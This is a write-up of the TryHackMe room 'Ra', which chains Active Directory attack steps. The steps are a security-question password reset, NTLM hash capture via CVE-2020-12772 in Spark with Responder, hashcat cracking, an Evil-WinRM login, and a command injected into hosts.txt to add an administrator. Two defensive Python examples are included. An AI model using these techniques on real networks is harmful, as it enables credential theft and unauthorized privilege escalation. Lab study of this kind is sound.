TryHackMe | Ra
Ra is a hard-rated TryHackMe room set inside a simulated corporate Windows Active Directory environment. The challenge tasks you with compromising WindCorp's internal network, working from an external foothold all the way through to Domain Controller access. It covers OSINT-based password reset, exploiting a vulnerable XMPP client to steal NTLM hashes, cracking those hashes with hashcat, and a creative privilege escalation using a scheduled script that reads an attacker-controlled file. I found this room a lot of fun. I think it does a good job of chaining together techniques you'd use in a real Active Directory engagement.
Reconnaissance
Port Scanning
The nmap scan reveals a full Windows domain controller environment:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm)
445/tcp open microsoft-ds
464/tcp open kpasswd5
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3389/tcp open ms-wbt-server Microsoft Terminal Services
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
7070/tcp open http Jetty 9.4.18.v20190429 (Openfire HTTP Binding)
9090/tcp open zeus-admin
The domain is windcorp.thm, and the machine is named FIRE. A few things immediately stand out: we have a full AD setup (DNS, Kerberos, LDAP, SMB) and an Openfire XMPP Jabber server running on port 5222. The Spark XMPP client is commonly used with Openfire and actually becomes our key to an initial foothold.
Password Reset
The WindCorp website on port 80 includes an employee directory with photos. One profile belongs to a user called Lily, and the password reset page for the domain asks a security question about the name of her pet.
A quick look at the employee photo on the website reveals her pet's name. I won't spell it out here, but it's visible in the image. Using that answer, I reset Lily's account (lilyle) to a new password.
SMB Enumeration
With lilyle's credentials in hand, I used smbclient to enumerate shares:
Disk Permissions
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
Shared READ ONLY
SYSVOL READ ONLY
Users READ ONLY
The Shared share is accessible. Inside it I found Flag 1 and, more importantly, installers for Spark version 2.8.3 for Windows, Mac, and Linux.
smb: \> ls
Flag 1.txt A 45 Fri May 1 17:32:36 2020
spark_2_8_3.deb A 29526628 Sat May 30 02:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 13:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 13:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 13:07:24 2020
The fact that the company is distributing a specific version of Spark is a hint. Spark 2.8.3 is vulnerable to CVE-2020-12772.
Exploiting CVE-2020-12772
NTLM Hash Capture
CVE-2020-12772 is a vulnerability in the Spark XMPP client: when a received message contains an img tag whose source points to an attacker-controlled server, the recipient's client automatically makes an HTTP request to that server and, when challenged, sends the user's NTLM credentials with it.
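From the defender's side, the same behaviour is easy to spot in message traffic: any img source that leaves the trusted host set is a candidate for a credential-leak attempt. The following is an added example, not part of the original writeup or of Spark/Openfire; it assumes an allowlist of image hosts (fire.windcorp.thm is assumed) and constructed sample messages.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Image hosts that internal XMPP messages are allowed to reference (assumed allowlist).
ALLOWED_IMAGE_HOSTS = {"fire.windcorp.thm"}

# Matches the src attribute of any <img> tag in an XHTML-IM message body.
IMG_SRC_RE = re.compile(r"<img\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)


def find_external_images(body):
    """Return (url, reason) pairs for every <img> source that would make a
    Spark client open a network connection to a non-allowlisted location."""
    findings = []
    for url in IMG_SRC_RE.findall(body):
        parsed = urlparse(url)
        if parsed.scheme.lower() not in ("http", "https"):
            continue  # data: or cid: images are rendered without a request
        host = (parsed.hostname or "").lower()
        if host in ALLOWED_IMAGE_HOSTS:
            continue
        try:
            ip = ipaddress.ip_address(host)
            reason = "private IP literal" if ip.is_private else "public IP literal"
        except ValueError:
            reason = "unapproved host"
        findings.append((url, reason))
    return findings


def scan_messages(messages):
    """messages: iterable of (sender, recipient, body) tuples, e.g. taken from an
    Openfire message audit log. Returns one alert dict per suspicious image."""
    alerts = []
    for sender, recipient, body in messages:
        for url, reason in find_external_images(body):
            alerts.append({"from": sender, "to": recipient, "url": url, "reason": reason})
    return alerts


# Constructed sample messages (not captured from the room); 10.8.0.2 is a made-up VPN address.
SAMPLE_MESSAGES = [
    ("lilyle@windcorp.thm", "buse@windcorp.thm",
     '<body><img src="http://10.8.0.2/pic.png"/></body>'),
    ("it@windcorp.thm", "buse@windcorp.thm",
     '<body><img src="https://fire.windcorp.thm/logo.png"/></body>'),
    ("buse@windcorp.thm", "lilyle@windcorp.thm", "<body>see you at 10</body>"),
]

if __name__ == "__main__":
    for alert in scan_messages(SAMPLE_MESSAGES):
        print(alert)
```

Only the first message is flagged: an image pulled from a raw private address that is not the chat server itself.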
The attack is simple:
- Install Spark 2.8.3 and log in with the lilyle credentials.
- Start Responder on my attacking machine to capture NTLM authentication attempts.
- Find the only online user in the XMPP roster (in this case, Buse Candan) and send them a message containing an img tag with my tun0 IP address.
Responder catches the callback almost immediately:
[HTTP] NTLMv2 Client : 10.10.216.105
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:adbbb4ecad851d7a:F0CA3B187AF814F12A5...
Cracking the Hash
With the NTLMv2 hash captured, I passed it to hashcat using mode 5600 (NetNTLMv2) against rockyou.txt:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
The hash cracks quickly, giving us Buse's password: uzunLM+3131
Foothold via Evil-WinRM
With Buse's credentials I can connect over WinRM, which is enabled on this machine:
evil-winrm -u buse -p 'uzunLM+3131' -i windcorp.thm
Flag 2 is on Buse's desktop. More interestingly, there's a Notes.txt file revealing that a hosts.txt file belonging to another user (brittanycr) is periodically read by a PowerShell script that runs with administrator privileges. The contents of hosts.txt are appended to a command that gets executed. This looks promising.
Privilege Escalation
Buse has the ability to create new users and change other users' passwords. I changed brittanycr's password and logged in to her SMB share to overwrite hosts.txt with:
google.com; net localgroup Administrators gareth /add
When the scheduled PowerShell script next runs as admin, it processes hosts.txt and my injected command runs, adding my user to the local Administrators group. After waiting a moment, I reconnected via Evil-WinRM as my newly elevated account and grabbed the final flag:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type Flag3.txt
THM{ba3a...aef}
Summary
Ra is a well-constructed room that chains together several techniques you'd actually use against a real Windows domain:
- OSINT to answer a security question and gain an initial set of credentials
- SMB enumeration to discover both loot and the clue about which software is deployed
- CVE-2020-12772 - a client-side vulnerability in Spark that leaks NTLM hashes when a crafted message is received
- NTLMv2 hash cracking with hashcat
- Evil-WinRM for lateral movement once valid credentials are in hand
- Script injection via an attacker-controlled file that a privileged process reads
The privilege escalation step in particular felt realistic. A scheduled task reading from a file the wrong user has write access to is exactly the kind of misconfiguration you might find in real environments.
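The fix for that misconfiguration is twofold: tighten the ACL so the scheduled task's input file is not writable by a low-privilege account, and never splice file contents into a command string. The following is an added example, not the room's script or any WindCorp code; it assumes the task pings each listed host and shows the input validation and argument-list construction that would have rejected the injected line above.

```python
import re

# One RFC 1123 hostname per line: labels of letters, digits and hyphens,
# no leading or trailing hyphen, at most 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def parse_hosts_file(text):
    """Split hosts.txt into (accepted, rejected) lists. A line is accepted only
    if the entire line is a syntactically valid hostname; anything else
    (spaces, ';', '&', '|', extra commands) is rejected whole, never trimmed."""
    accepted, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        (accepted if HOSTNAME_RE.match(line) else rejected).append(line)
    return accepted, rejected


def unsafe_command_string(line):
    """The pattern the room describes (assumed shape): file contents appended
    to a command string. Whatever follows a ';' becomes a second command."""
    return "ping -n 1 " + line


def safe_command_argv(host):
    """Hardened form: the host is one argv element for subprocess.run(..., shell=False)
    (or -ArgumentList in PowerShell), so metacharacters can never start a new command."""
    return ["ping", "-n", "1", host]


# Constructed hosts.txt, including the injected line quoted in the writeup.
CONSTRUCTED_HOSTS_TXT = """# hosts checked by the nightly task (constructed sample)
google.com
fire.windcorp.thm
google.com; net localgroup Administrators gareth /add
"""

if __name__ == "__main__":
    ok, bad = parse_hosts_file(CONSTRUCTED_HOSTS_TXT)
    print("would run:", [safe_command_argv(h) for h in ok])
    print("rejected :", bad)
```

The rejected list is what the task should log as an alert, since a host file that suddenly contains a command line is itself an indicator of tampering.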
Overall I think this was a really good room.